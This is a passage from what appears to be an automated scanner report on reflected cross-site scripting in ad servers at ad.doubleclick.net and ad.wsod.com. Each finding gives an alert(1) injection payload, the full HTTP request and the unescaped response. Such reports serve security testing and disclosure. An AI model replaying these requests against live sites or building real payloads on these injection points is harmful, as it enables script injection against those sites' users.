Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
tude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXTae172"-alert(1)-"f6eedac639f&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B41452996/41470783/1%3B%3B%7Esscs%3D%3f";

...[SNIP]...

5.42. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5188d"-alert(1)-"a33579bde31 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=83082445188d"-alert(1)-"a33579bde31&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36947

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=83082445188d"-alert(1)-"a33579bde31&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/250%3B41450394/41468181/
...[SNIP]...

5.43. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f01"-alert(1)-"f34eea5e6e6 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G56f01"-alert(1)-"f34eea5e6e6&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36943

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G56f01"-alert(1)-"f34eea5e6e6&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/o%3B239602042%3B1-0%3B0%3B62436413%3B4307-300/250%3B4
...[SNIP]...

5.44. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4009"-alert(1)-"ec217f7248b was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=a4009"-alert(1)-"ec217f7248b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36947
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:42:04 GMT
Expires: Tue, 26 Apr 2011 18:42:04 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ghUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=a4009"-alert(1)-"ec217f7248bhttp://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413%3B4307-300/250%3B41450394/41468181/1%3B%3B%7Esscs%3D%3f";
this.clickN = "0";
t
...[SNIP]...

5.45. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.MSN/B5070033.106

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e018"-alert(1)-"0e1e7727ec4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:40:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 36947

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
)
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dc/%2a/s%3B239602042%3B0-0%3B0%3B62436413
...[SNIP]...

5.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8012'-alert(1)-'4150aa4ae71 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:00 GMT; path=/
Set-Cookie: i_1=33:1411:836:100:0:40771:1303843020:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }

...[SNIP]...

5.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b897'-alert(1)-'1221f18c50f was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:52 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:40771:1303843012:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:52 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 910

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               ret
...[SNIP]...

5.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54622'-alert(1)-'002a9baae46 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:16 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:40771:1303843036:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 914

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       docum
...[SNIP]...

5.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58bcb'-alert(1)-'b02bf13cdc7 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:28 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:40771:1303843048:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 924

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10
...[SNIP]...

5.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a79'-alert(1)-'9ef692e406f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:24 GMT; path=/
Set-Cookie: i_1=33:1411:794:100:0:40771:1303843044:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       document.write(
...[SNIP]...

5.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140d'-alert(1)-'366f24d7955 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:12 GMT; path=/
Set-Cookie: i_1=33:1411:794:100:0:40771:1303843032:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:12 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image14
...[SNIP]...

5.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc7e5'-alert(1)-'6ddd018aaa was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:07 GMT; path=/
